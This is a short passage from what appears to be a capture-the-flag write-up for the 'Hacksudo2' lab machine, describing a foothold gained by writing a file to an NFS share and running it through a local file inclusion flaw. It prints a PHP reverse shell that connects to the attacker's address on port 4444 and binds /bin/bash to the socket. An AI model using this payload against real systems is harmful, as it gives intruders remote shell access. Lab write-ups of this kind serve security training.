http://r2km7u25qebaefa7b6jdcjldymc2u337vzpx7ne773ypgs3qlq4xycqd.onion/index.php?page=Hacksudo2
Establishing a Foothold With both NFS access and LFI confirmed, I could now create a PHP reverse shell on the NFS share and execute it via the web server: Created a PHP reverse shell file: <?php
$sock=fsockopen("[MY_IP]",4444);$proc=proc_open("/bin/bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?